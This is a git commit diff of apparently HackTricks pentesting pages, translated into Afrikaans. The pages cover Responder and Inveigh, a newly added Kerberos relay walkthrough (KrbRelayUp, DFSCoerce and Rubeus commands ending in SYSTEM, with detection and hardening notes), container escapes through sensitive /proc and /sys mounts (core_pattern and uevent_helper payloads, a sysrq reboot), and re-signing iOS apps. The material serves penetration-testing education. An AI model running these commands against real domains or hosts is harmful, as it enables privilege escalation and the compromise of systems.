Translated ['src/generic-methodologies-and-resources/pentesting-network/

This commit is contained in:
Translator 2025-05-11 15:12:47 +00:00
parent bc94230320
commit 69c46a0a55
5 changed files with 276 additions and 75 deletions

View File

@ -316,6 +316,7 @@
- [Drozer Tutorial](mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md)
- [Exploiting Content Providers](mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md)
- [Exploiting a debuggeable application](mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md)
- [Flutter](mobile-pentesting/android-app-pentesting/flutter.md)
- [Frida Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/README.md)
- [Frida Tutorial 1](mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md)
- [Frida Tutorial 2](mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md)
@ -342,6 +343,7 @@
- [iOS Extracting Entitlements From Compiled Application](mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md)
- [iOS Frida Configuration](mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md)
- [iOS Hooking With Objection](mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md)
- [iOS Pentesting withuot Jailbreak](mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md)
- [iOS Protocol Handlers](mobile-pentesting/ios-pentesting/ios-protocol-handlers.md)
- [iOS Serialisation and Encoding](mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md)
- [iOS Testing Environment](mobile-pentesting/ios-pentesting/ios-testing-environment.md)

View File

@ -24,12 +24,12 @@
- Dit kom vooraf geïnstalleer in Kali Linux, konfigureerbaar by `/etc/responder/Responder.conf`.
- Responder vertoon gevangen hashes op die skerm en stoor dit in die `/usr/share/responder/logs` gids.
- Dit ondersteun beide IPv4 en IPv6.
- Windows weergawe van Responder is beskikbaar [hier](https://github.com/lgandx/Responder-Windows).
- Windows weergawe van Responder is [hier](https://github.com/lgandx/Responder-Windows) beskikbaar.
#### Responder Uitvoer
- Om Responder met standaardinstellings te laat loop: `responder -I <Interface>`
- Vir meer aggressiewe ondersoek (met potensiële newe-effekte): `responder -I <Interface> -P -r -v`
- Vir meer aggressiewe ondersoek (met moontlike newe-effekte): `responder -I <Interface> -P -r -v`
- Tegnieke om NTLMv1 uitdagings/antwoorde te vang vir makliker krak: `responder -I <Interface> --lm --disable-ess`
- WPAD-na-booting kan geaktiveer word met: `responder -I <Interface> --wpad`
- NetBIOS versoeke kan opgelos word na die aanvaller se IP, en 'n verifikasie-proxy kan opgestel word: `responder.py -I <interface> -Pv`
@ -41,16 +41,16 @@
- Om die aanval te laat loop: `./Responder.py -I eth0 -Pdv`
- Hierdie metode kan effektief NTLMv1/2 hashes vang, maar dit vereis versigtige hantering om netwerkonderbreking te vermy.
### Capturing Credentials with Responder
### Capturing Kredensiale met Responder
- Responder sal dienste na boots met die bogenoemde protokolle, en kredensiale (gewoonlik NTLMv2 Challenge/Response) vang wanneer 'n gebruiker probeer om teen die gespoofde dienste te verifieer.
- Responder sal dienste na boots met die bogenoemde protokolle, en kredensiale (gewoonlik NTLMv2 Uitdaging/Antwoord) vang wanneer 'n gebruiker probeer om teen die gespoofde dienste te verifieer.
- Pogings kan aangewend word om af te gradeer na NetNTLMv1 of ESS te deaktiveer vir makliker kredensiaal krak.
Dit is van kardinale belang om te noem dat die gebruik van hierdie tegnieke wettig en eties moet wees, met behoorlike magtiging en om onderbreking of ongeoorloofde toegang te vermy.
Dit is van kardinale belang om op te let dat die gebruik van hierdie tegnieke wettig en eties moet wees, met behoorlike magtiging en om onderbreking of ongeoorloofde toegang te vermy.
## Inveigh
Inveigh is 'n hulpmiddel vir penetrasietoetsers en rooi spanlede, ontwerp vir Windows stelsels. Dit bied funksies soortgelyk aan Responder, wat spoofing en man-in-the-middle-aanvalle uitvoer. Die hulpmiddel het ontwikkel van 'n PowerShell-skrip na 'n C# binaire, met [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) en [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as die hoof weergawes. Gedetailleerde parameters en instruksies kan in die [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) gevind word.
Inveigh is 'n hulpmiddel vir penetrasietoetsers en rooi spanlede, ontwerp vir Windows stelsels. Dit bied funksies soortgelyk aan Responder, wat spoofing en man-in-the-middle aanvalle uitvoer. Die hulpmiddel het ontwikkel van 'n PowerShell-skrip na 'n C# binaire, met [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) en [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero) as die hoof weergawes. Gedetailleerde parameters en instruksies kan in die [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) gevind word.
Inveigh kan deur PowerShell bedryf word:
```bash
@ -69,7 +69,7 @@ Hierdie aanval benut SMB-authentikasiesessies om toegang tot 'n teikenmasjien te
#### 445 Poort Voorwaartse en Tunneling
In scenario's waar direkte netwerkintroduksie nie haalbaar is nie, moet verkeer op poort 445 voorwaarts en getunnel word. Gereedskap soos [**PortBender**](https://github.com/praetorian-inc/PortBender) help om poort 445-verkeer na 'n ander poort te herlei, wat noodsaaklik is wanneer lokale admin-toegang beskikbaar is vir stuurprogramlaai.
In scenario's waar direkte netwerkintroduksie nie haalbaar is nie, moet verkeer op poort 445 voorwaarts en getunnel word. Gereedskap soos [**PortBender**](https://github.com/praetorian-inc/PortBender) help om poort 445-verkeer na 'n ander poort te herlei, wat noodsaaklik is wanneer lokale admin-toegang beskikbaar is vir bestuurderlaai.
PortBender opstelling en werking in Cobalt Strike:
```bash
@ -115,7 +115,114 @@ In Windows **kan jy dalk sommige bevoorregte rekeninge dwing om te autentiseer o
../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
{{#endref}}
## References
## Kerberos Relay aanval
'n **Kerberos relay aanval** steel 'n **AP-REQ kaartjie** van een diens en hergebruik dit teen 'n tweede diens wat die **dieselfde rekenaar-rekening sleutel** deel (omdat beide SPNs op dieselfde `$` masjienrekening sit). Dit werk selfs al verskil die SPNs **diensklasse** (bv. `CIFS/``LDAP/`) omdat die *sleutel* wat die kaartjie ontsleutel, die masjien se NT-hash is, nie die SPN-string self nie en die SPN-string is nie deel van die handtekening nie.
In teenstelling met NTLM relay, is die sprong beperk tot die *dieselfde gasheer* maar, as jy 'n protokol teiken wat jou toelaat om na LDAP te skryf, kan jy in **Hulpbron-gebaseerde Beperkte Afvaardiging (RBCD)** of **AD CS inskrywing** ketting en **NT AUTHORITY\SYSTEM** in 'n enkele skoot pop.
Vir gedetailleerde inligting oor hierdie aanval, kyk:
- [https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html](https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html)
- [https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/](https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/)
- 1. **Kerberos basiese beginsels**
| Token | Doel | Relay relevantie |
|-------|---------|-----------------|
| **TGT / AS-REQ ↔ REP** | Bewys die gebruiker aan die KDC | onaangeraak |
| **Diens kaartjie / TGS-REQ ↔ REP** | Gebonden aan een **SPN**; versleuteld met die SPN-eienaar se sleutel | uitruilbaar as SPNs rekening deel |
| **AP-REQ** | Kliënt stuur `TGS` na die diens | **wat ons steel & herhaal** |
* Kaartjies is versleuteld met die **wagwoord-afgeleide sleutel van die rekening wat die SPN besit**.
* Die **Authenticator** binne die AP-REQ het 'n 5-minuut tydstempel; herhaling binne daardie venster is geldig totdat die dienskas 'n duplikaat sien.
* Windows kontroleer selde of die SPN-string in die kaartjie ooreenstem met die diens wat jy tref, so 'n kaartjie vir `CIFS/HOST` ontsleutel normaalweg goed op `LDAP/HOST`.
- 2. **Wat moet waar wees om Kerberos te relay**
1. **Gedeelde sleutel:** bron en teiken SPNs behoort aan dieselfde rekenaarrekening (standaard op Windows bedieners).
2. **Geen kanaalbeskerming:** SMB/LDAP ondertekening af en EPA af vir HTTP/LDAPS.
3. **Jy kan autentisering onderskep of dwing:** LLMNR/NBNS vergiftiging, DNS spoof, **PetitPotam / DFSCoerce RPC**, vals AuthIP, rogue DCOM, ens.
4. **Kaartjie bron nie reeds gebruik nie:** jy wen die wedloop voordat die werklike pakket aankom of blokkeer dit heeltemal; anders skiet die bediener se herhalingskas Gebeurtenis 4649 af.
5. Jy moet op een of ander manier in staat wees om 'n **MitM in die kommunikasie** uit te voer, dalk deel van die DNSAmins-groep wees om die DNS van die domein te verander of in staat wees om die HOST-lêer van die slagoffer te verander.
### Kerberos Relay Stappe
- 3.1 **Recon die gasheer**
```powershell
# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName
```
- 3.2 **Begin die relay luisteraar**
[KrbRelayUp](https://github.com/Dec0ne/KrbRelayUp)
```powershell
# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8
```
`KrbRelayUp` verpak **KrbRelay → LDAP → RBCD → Rubeus → SCM omseiling** in een binêre.
- 3.3 **Dwing Kerberos outentisering**
```powershell
# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50
```
DFSCoerce laat die DC toe om 'n Kerberos `CIFS/DC01` kaartjie na ons te stuur.
- 3.4 **Herleef die AP-REQ**
KrbRelay onttrek die GSS blob uit SMB, herverpak dit in 'n LDAP bind, en stuur dit na `ldap://DC01`—autentisering slaag omdat die **dieselfde sleutel** dit ontsleutel.
- 3.5 **Misbruik LDAP ➜ RBCD ➜ SISTEEM**
```powershell
# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe
```
You now own **NT AUTHORITY\SYSTEM**.
### **Meer paaie wat die moeite werd is om te ken**
| Vektor | Truuk | Hoekom dit belangrik is |
|--------|-------|----------------|
| **AuthIP / IPSec** | Vals bediener stuur 'n **GSS-ID payload** met enige SPN; kliënt bou 'n AP-REQ reg na jou | Werk selfs oor subnets; masjien krediete per standaard |
| **DCOM / MSRPC** | Kwaadwillige OXID-oplosser dwing kliënt om te autentiseer na arbitrêre SPN en poort | Pure *lokale* priv-eskalering; omseil firewall |
| **AD CS Web Enroll** | Relay masjien kaart na `HTTP/CA` en kry 'n sertifikaat, dan **PKINIT** om TGT's te mint | Omseil LDAP ondertekening verdediging |
| **Shadow Credentials** | Skryf `msDS-KeyCredentialLink`, dan PKINIT met vervalste sleutel paar | Geen behoefte om 'n rekenaarrekening by te voeg nie |
### **Probleemoplossing**
| Fout | Betekenis | Regstelling |
|-------|---------|-----|
| `KRB_AP_ERR_MODIFIED` | Kaart sleutel ≠ teiken sleutel | Verkeerde gasheer/SPN |
| `KRB_AP_ERR_SKEW` | Klok > 5 min offset | Sink tyd of gebruik `w32tm` |
| LDAP bind misluk | Ondertekening afgedwing | Gebruik AD CS pad of deaktiveer ondertekening |
| Gebeurtenis 4649 spam | Diens het duplikaat Authenticator gesien | blok of wedloop oorspronklike pakket |
### **Detectie**
* Toename in **Gebeurtenis 4769** vir `CIFS/`, `HTTP/`, `LDAP/` van dieselfde bron binne sekondes.
* **Gebeurtenis 4649** op die diens dui aan dat herhaling opgespoor is.
* Kerberos aanmelding van **127.0.0.1** (relay na plaaslike SCM) is hoogs verdag—kaart via Sigma-reël in KrbRelayUp docs.
* Kyk na veranderinge aan `msDS-AllowedToActOnBehalfOfOtherIdentity` of `msDS-KeyCredentialLink` eienskappe.
## **Versterking**
1. **Handhaaf LDAP & SMB ondertekening + EPA** op elke bediener.
2. **Verdeel SPNs** sodat HTTP nie op dieselfde rekening as CIFS/LDAP is nie.
3. Patches vir dwang vektore (PetitPotam KB5005413, DFS, AuthIP).
4. Stel **`ms-DS-MachineAccountQuota = 0`** in om rogue rekenaar aansluitings te stop.
5. Waak op **Gebeurtenis 4649** en onverwagte loopback Kerberos aanmeldings.
## Verwysings
- [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
- [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)

View File

@ -2,7 +2,7 @@
{{#include ../../../../banners/hacktricks-training.md}}
Die blootstelling van `/proc`, `/sys`, en `/var` sonder behoorlike naamruimte-isolasie stel beduidende sekuriteitsrisiko's in, insluitend die vergroting van die aanvaloppervlak en inligtingsontsluiting. Hierdie gidse bevat sensitiewe lêers wat, indien verkeerd geconfigureer of deur 'n nie-geautoriseerde gebruiker toegang verkry, kan lei tot houerontvlugting, gasheerwysiging, of inligting kan verskaf wat verdere aanvalle ondersteun. Byvoorbeeld, om `-v /proc:/host/proc` verkeerd te monteer kan AppArmor-beskerming omseil weens sy pad-gebaseerde aard, wat `/host/proc` onbeskermd laat.
Die blootstelling van `/proc`, `/sys`, en `/var` sonder behoorlike naamruimte-isolasie stel beduidende sekuriteitsrisiko's in, insluitend die vergroting van die aanvaloppervlak en inligtingsontsluiting. Hierdie gidse bevat sensitiewe lêers wat, indien verkeerd geconfigureer of deur 'n ongemagtigde gebruiker toegang verkry, kan lei tot houerontvlugting, gasheerwysiging, of inligting kan verskaf wat verdere aanvalle ondersteun. Byvoorbeeld, om `-v /proc:/host/proc` verkeerd te monteer kan AppArmor-beskerming omseil weens sy padgebaseerde aard, wat `/host/proc` onbeskermd laat.
**Jy kan verdere besonderhede van elke potensiële kwesbaarheid vind in** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
@ -15,21 +15,33 @@ Hierdie gids laat toegang toe om kernvariabeles te wysig, gewoonlik via `sysctl(
#### **`/proc/sys/kernel/core_pattern`**
- Beskryf in [core(5)](https://man7.org/linux/man-pages/man5/core.5.html).
- Laat toe om 'n program te definieer wat uitgevoer moet word op kernlêer-generasie met die eerste 128 bytes as argumente. Dit kan lei tot kode-uitvoering as die lêer met 'n pyp `|` begin.
- **Toets en Exploit Voorbeeld**:
- As jy binne hierdie lêer kan skryf, is dit moontlik om 'n pyp `|` gevolg deur die pad na 'n program of skrip te skryf wat uitgevoer sal word nadat 'n ongeluk plaasvind.
- 'n Aanvaller kan die pad binne die gasheer na sy houer vind deur `mount` uit te voer en die pad na 'n binêre lêer binne sy houer lêerstelsel te skryf. Dan, laat 'n program crash om die kern die binêre lêer buite die houer te laat uitvoer.
- **Toetsing en Exploit Voorbeeld**:
```bash
[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Toets skrywe toegang
[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Test write access
cd /proc/sys/kernel
echo "|$overlay/shell.sh" > core_pattern # Stel pasgemaakte handler in
echo "|$overlay/shell.sh" > core_pattern # Set custom handler
sleep 5 && ./crash & # Trigger handler
```
Kontroleer [hierdie pos](https://pwning.systems/posts/escaping-containers-for-fun/) vir meer inligting.
Voorbeeldprogram wat crash:
```c
int main(void) {
char buf[1];
for (int i = 0; i < 100; i++) {
buf[i] = 1;
}
return 0;
}
```
#### **`/proc/sys/kernel/modprobe`**
- Gedetailleerd in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
- Bevat die pad na die kernmodule-laaier, wat aangeroep word om kernmodules te laai.
- **Kontroleer Toegang Voorbeeld**:
- Bevat die pad na die kernmodule laaier, wat aangeroep word om kernmodules te laai.
- **Toegang Kontrole Voorbeeld**:
```bash
ls -l $(cat /proc/sys/kernel/modprobe) # Kontroleer toegang tot modprobe
@ -38,18 +50,18 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Kontroleer toegang tot modprobe
#### **`/proc/sys/vm/panic_on_oom`**
- Verwys na [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
- 'n Globale vlag wat beheer of die kern paniek of die OOM-killer aanroep wanneer 'n OOM-toestand voorkom.
- 'n Globale vlag wat beheer of die kern paniek of die OOM killer aanroep wanneer 'n OOM toestand voorkom.
#### **`/proc/sys/fs`**
- Volgens [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html), bevat opsies en inligting oor die lêerstelsel.
- Skrywe toegang kan verskeie ontkenning van diens-aanvalle teen die gasheer moontlik maak.
- Skryftoegang kan verskeie ontkenning-van-diens aanvalle teen die gasheer moontlik maak.
#### **`/proc/sys/fs/binfmt_misc`**
- Laat toe om interpreteerders vir nie-inheemse binêre formate te registreer gebaseer op hul magiese nommer.
- Kan lei tot voorregverhoging of wortel-sheltoegang as `/proc/sys/fs/binfmt_misc/register` skryfbaar is.
- Betrokke exploit en verduideliking:
- Laat registrasie van interprete vir nie-inheemse binêre formate gebaseer op hul magiese nommer toe.
- Kan lei tot privilige-escalasie of root shell toegang as `/proc/sys/fs/binfmt_misc/register` skryfbaar is.
- Betrokke uitbuiting en verduideliking:
- [Poor man's rootkit via binfmt_misc](https://github.com/toffan/binfmt_misc)
- Diepgaande tutoriaal: [Video skakel](https://www.youtube.com/watch?v=WBC7hhgMvQQ)
@ -62,7 +74,7 @@ ls -l $(cat /proc/sys/kernel/modprobe) # Kontroleer toegang tot modprobe
#### **`/proc/sysrq-trigger`**
- Laat toe om Sysrq-opdragte aan te roep, wat moontlik onmiddellike stelselhervattings of ander kritieke aksies kan veroorsaak.
- Laat aanroep van Sysrq-opdragte toe, wat moontlik onmiddellike stelselhervattings of ander kritieke aksies kan veroorsaak.
- **Hervatting van Gasheer Voorbeeld**:
```bash
@ -71,48 +83,48 @@ echo b > /proc/sysrq-trigger # Hervat die gasheer
#### **`/proc/kmsg`**
- Blootstel kernringbufferboodskappe.
- Kan help in kern exploits, adreslekas, en sensitiewe stelselinligting verskaf.
- Stel kernringbuffer boodskappe bloot.
- Kan help met kernuitbuitings, adreslekke, en sensitiewe stelselinligting verskaf.
#### **`/proc/kallsyms`**
- Lys kern-eksporteerde simbole en hul adresse.
- Essensieel vir kern exploit ontwikkeling, veral om KASLR te oorkom.
- Lys kern uitgevoerde simbole en hul adresse.
- Essensieel vir kernuitbuiting ontwikkeling, veral om KASLR te oorkom.
- Adresinligting is beperk met `kptr_restrict` op `1` of `2` gestel.
- Besonderhede in [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
#### **`/proc/[pid]/mem`**
- Interfereer met die kern geheue toestel `/dev/mem`.
- Histories kwesbaar vir voorregverhoging aanvalle.
- Histories kwesbaar vir privilige-escalasie aanvalle.
- Meer oor [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html).
#### **`/proc/kcore`**
- Verteenwoordig die stelsels fisiese geheue in ELF kernformaat.
- Lees kan die gasheerstelsel en ander houers se geheue-inhoud lek.
- Groot lêergrootte kan lei tot leesprobleme of sagtewarekrake.
- Verteenwoordig die stelsel se fisiese geheue in ELF kern formaat.
- Lees kan die gasheer stelsel en ander houers se geheue-inhoud lek.
- Groot lêergrootte kan lei tot leesprobleme of sagteware crashes.
- Gedetailleerde gebruik in [Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/).
#### **`/proc/kmem`**
- Alternatiewe interfase vir `/dev/kmem`, wat kern virtuele geheue verteenwoordig.
- Laat lees en skryf toe, dus direkte wysiging van kern geheue.
- Laat lees en skryf toe, dus direkte verandering van kern geheue.
#### **`/proc/mem`**
- Alternatiewe interfase vir `/dev/mem`, wat fisiese geheue verteenwoordig.
- Laat lees en skryf toe, wysiging van alle geheue vereis om virtuele na fisiese adresse op te los.
- Laat lees en skryf toe, verandering van alle geheue vereis om virtuele na fisiese adresse op te los.
#### **`/proc/sched_debug`**
- Gee proses skedulering inligting terug, wat PID naamruimte beskermings omseil.
- Blootstel prosesname, ID's, en cgroup identifiseerders.
- Teruggee proses skedulering inligting, wat PID naamruimte beskermings omseil.
- Stel prosesname, ID's, en cgroup identifiseerders bloot.
#### **`/proc/[pid]/mountinfo`**
- Verskaf inligting oor monteerpunte in die proses se monteernaamruimte.
- Blootstel die ligging van die houer `rootfs` of beeld.
- Verskaf inligting oor monteerpunte in die proses se monteer naamruimte.
- Stel die ligging van die houer `rootfs` of beeld bloot.
### `/sys` Kwesbaarhede
@ -120,7 +132,7 @@ echo b > /proc/sysrq-trigger # Hervat die gasheer
- Gebruik vir die hantering van kern toestel `uevents`.
- Skryf na `/sys/kernel/uevent_helper` kan arbitrêre skripte uitvoer wanneer `uevent` triggers plaasvind.
- **Voorbeeld vir Exploit**: %%%bash
- **Voorbeeld vir Uitbuiting**: %%%bash
#### Skep 'n payload
@ -130,7 +142,7 @@ echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /ev
host*path=$(sed -n 's/.*\perdir=(\[^,]\_).\*/\1/p' /etc/mtab)
#### Stel uevent_helper in op kwaadwillige helper
#### Stel uevent_helper na kwaadwillige helper
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
@ -144,7 +156,7 @@ cat /output %%%
#### **`/sys/class/thermal`**
- Beheer temperatuurinstellings, wat moontlik DoS-aanvalle of fisiese skade kan veroorsaak.
- Beheer temperatuurinstellings, wat moontlik DoS aanvalle of fisiese skade kan veroorsaak.
#### **`/sys/kernel/vmcoreinfo`**
@ -152,13 +164,13 @@ cat /output %%%
#### **`/sys/kernel/security`**
- Huisves `securityfs` interfase, wat konfigurasie van Linux Sekuriteitsmodules soos AppArmor toelaat.
- Toegang mag 'n houer in staat stel om sy MAC-stelsel te deaktiveer.
- Huisves `securityfs` interfase, wat konfigurasie van Linux Veiligheidsmodules soos AppArmor toelaat.
- Toegang mag 'n houer in staat stel om sy MAC stelsel te deaktiveer.
#### **`/sys/firmware/efi/vars` en `/sys/firmware/efi/efivars`**
- Blootstel interfaces vir interaksie met EFI veranderlikes in NVRAM.
- Misconfigurasie of eksploit kan lei tot gebroke skootrekenaars of onbootbare gasheer masjiene.
- Stel interfaces bloot vir interaksie met EFI veranderlikes in NVRAM.
- Misconfigurasie of uitbuiting kan lei tot gebroke skootrekenaars of onbootbare gasheer masjiene.
#### **`/sys/kernel/debug`**
@ -167,7 +179,7 @@ cat /output %%%
### `/var` Kwesbaarhede
Die gasheer se **/var** gids bevat houer runtime sokke en die houers se lêerstelsels. As hierdie gids binne 'n houer gemonteer word, sal daardie houer lees-skrif toegang tot ander houers se lêerstelsels met wortel voorregte kry. Dit kan misbruik word om tussen houers te pivot, om 'n ontkenning van diens te veroorsaak, of om ander houers en toepassings wat daarin loop te backdoor.
Die gasheer se **/var** gids bevat houer runtime sokke en die houers se lêerstelsels. As hierdie gids binne 'n houer gemonteer word, sal daardie houer lees-skryf toegang tot ander houers se lêerstelsels met root priviligeë kry. Dit kan misbruik word om tussen houers te pivot, om 'n ontkenning van diens te veroorsaak, of om ander houers en toepassings wat daarin loop te backdoor.
#### Kubernetes
@ -218,7 +230,7 @@ Die XSS is bereik:
![Gestoorde XSS via gemonteerde /var-gids](/images/stored-xss-via-mounted-var-folder.png)
Let daarop dat die houer NIE 'n herstart of iets benodig nie. Enige veranderinge wat via die gemonteerde **/var**-gids gemaak word, sal onmiddellik toegepas word.
Let daarop dat die houer GEEN herstart of iets benodig nie. Enige veranderinge wat via die gemonteerde **/var**-gids gemaak word, sal onmiddellik toegepas word.
Jy kan ook konfigurasie lêers, binêre lêers, dienste, toepassingslêers en skulpprofiele vervang om outomatiese (of semi-outomatiese) RCE te bereik.
@ -235,7 +247,7 @@ Die houer kan K8s diensrekening tokens of AWS webidentiteit tokens lees wat die
```
#### Docker
Die uitbuiting in Docker (of in Docker Compose ontplooiings) is presies dieselfde, behalwe dat die ander houer se lêerstelsels gewoonlik beskikbaar is onder 'n ander basispad:
Die uitbuiting in Docker (of in Docker Compose ontplooiings) is presies dieselfde, behalwe dat die ander houers se lêerstelsels gewoonlik beskikbaar is onder 'n ander basispad:
```bash
$ docker info | grep -i 'docker root\|storage driver'
Storage Driver: overlay2

View File

@ -0,0 +1,76 @@
# iOS Pentesting without Jailbreak
{{#include ../../banners/hacktricks-training.md}}
## Hoof idee
Toepassings wat onderteken is met die **entitlement `get_task_allow`** laat derdeparty-toepassings toe om 'n funksie genaamd **`task_for_pid()`** met die proses-ID van die aanvanklike toepassing as argument te loop om die taakpoort daaroor te verkry (in staat wees om dit te beheer en toegang tot sy geheue te verkry).
Dit is egter nie so eenvoudig soos om net die IPA te trek, dit weer te onderteken met die entitlement, en dit terug na jou toestel te flits nie. Dit is weens FairPlay-beskerming. Wanneer die handtekening van die app verander, word die DRM (Digital Rights Management) sleutel **ongeldig gemaak en die app sal nie werk nie**.
Met 'n ou jailbreak toestel, is dit moontlik om die IPA te installeer, **dit te dekripteer met jou gunsteling hulpmiddel** (soos Iridium of frida-ios-dump), en dit terug van die toestel af te trek. Alhoewel, indien moontlik, word dit aanbeveel om net die kliënt te vra vir die gedekripteerde IPA.
## Verkry gedekripteerde IPA
### Kry dit van Apple
1. Installeer die app om te pentest in die iPhone
2. Installeer en begin [Apple Configurator](https://apps.apple.com/au/app/apple-configurator/id1037126344?mt=12) binne jou macos
3. Open `Terminal` op jou Mac, en cd na `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps`. Die IPA sal later in hierdie gids verskyn.
4. Jy behoort jou iOS-toestel te sien. Dubbelklik daarop, en klik dan op Voeg by + → Apps vanaf die boonste menu bar.
5. Nadat jy op Voeg by geklik het, sal Configurator die IPA van Apple aflaai, en probeer om dit na jou toestel te druk. As jy my aanbeveling vroeër gevolg het en die IPA reeds geïnstalleer het, sal 'n prompt wat jou vra om die app weer te installeer verskyn.
6. Die IPA behoort afgelaai te wees binne `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps` waar jy dit kan gryp.
Kyk [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed) vir meer gedetailleerde inligting oor hierdie proses.
### Dekripteer die app
Om die IPA te dekripteer gaan ons dit installeer. As jy egter 'n ou jailbreak iPhone het, is dit moontlik dat sy weergawe nie deur die toepassing ondersteun sal word nie, aangesien toepassings gewoonlik net die nuutste weergawes ondersteun.
So, om dit te installeer, ontsyfer net die IPA:
```bash
unzip redacted.ipa -d unzipped
```
Kontroleer die `Info.plist` vir die minimum ondersteunde weergawe en as jou toestel ouer is as dit, verander die waarde sodat dit ondersteun word.
Zip die IPA terug:
```bash
cd unzipped
zip -r ../no-min-version.ipa *
```
Dan installeer die IPA byvoorbeeld met:
```bash
ideviceinstaller -i no-min-version.ipa -w
```
Let daarop dat jy dalk **AppSync Unified tweak** van Cydia nodig het om enige `invalid signature` foute te voorkom.
Sodra dit geïnstalleer is, kan jy **Iridium tweak** van Cydia gebruik om die gedekripteerde IPA te verkry.
### Patch regte & herteken
Om die toepassing met die `get-task-allow` regte te herteken, is daar verskeie gereedskap beskikbaar soos `app-signer`, `codesign`, en `iResign`. `app-signer` het 'n baie gebruikersvriendelike koppelvlak wat dit baie maklik maak om 'n IPA-lêer te herteken deur die IPA aan te dui wat herteken moet word, om **dit `get-task-allow`** te gee en die sertifikaat en voorsieningsprofiel te gebruik.
Wat die sertifikaat en ondertekeningsprofiele betref, bied Apple **gratis ontwikkelaar ondertekeningsprofiele** vir alle rekeninge deur Xcode aan. Skep eenvoudig 'n app en konfigureer een. Konfigureer dan die **iPhone om die ontwikkelaar apps te vertrou** deur na `Settings``Privacy & Security` te navigeer, en klik op `Developer Mode`.
Met die herteken IPA is dit tyd om dit op die toestel te installeer om dit te pentest:
```bash
ideviceinstaller -i resigned.ipa -w
```
### Hook
Jy kan jou app maklik koppel met algemene gereedskap soos frida en objection:
```bash
objection -g [your app bundle ID] explore
```
## Verwysings
- [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -6,8 +6,8 @@
'n **Provisioning identiteit** is 'n versameling van publieke en private sleutels wat aan 'n Apple ontwikkelaar rekening gekoppel is. Om **apps te teken** moet jy **99$/jaar** betaal om te registreer in die **Apple Ontwikkelaar Program** om jou provisioning identiteit te verkry. Sonder dit sal jy nie in staat wees om toepassings vanaf die bronkode op 'n fisiese toestel te loop nie. 'n Ander opsie om dit te doen is om 'n **gejailbreakte toestel** te gebruik.
Begin in Xcode 7.2 het Apple 'n opsie verskaf om 'n **gratis iOS ontwikkeling provisioning profiel** te skep wat jou toelaat om jou toepassing op 'n werklike iPhone te skryf en te toets. Gaan na _Xcode_ --> _Voorkeure_ --> _Rekeninge_ --> _+_ (Voeg nuwe Appli ID by jou geloofsbriewe) --> _Klik op die Apple ID wat geskep is_ --> _Bestuur Sertifikate_ --> _+_ (Apple Ontwikkeling) --> _Klaar_\
\_\_Dan, om jou toepassing op jou iPhone te laat loop moet jy eers **die iPhone aanwys om die rekenaar te vertrou.** Dan kan jy probeer om **die toepassing op die mobiele toestel vanaf Xcode te laat loop,** maar 'n fout sal verskyn. Gaan dus na _Instellings_ --> _Algemeen_ --> _Profiele en Toestuurbestuur_ --> Kies die onbetroubare profiel en klik "**Vertrou**".
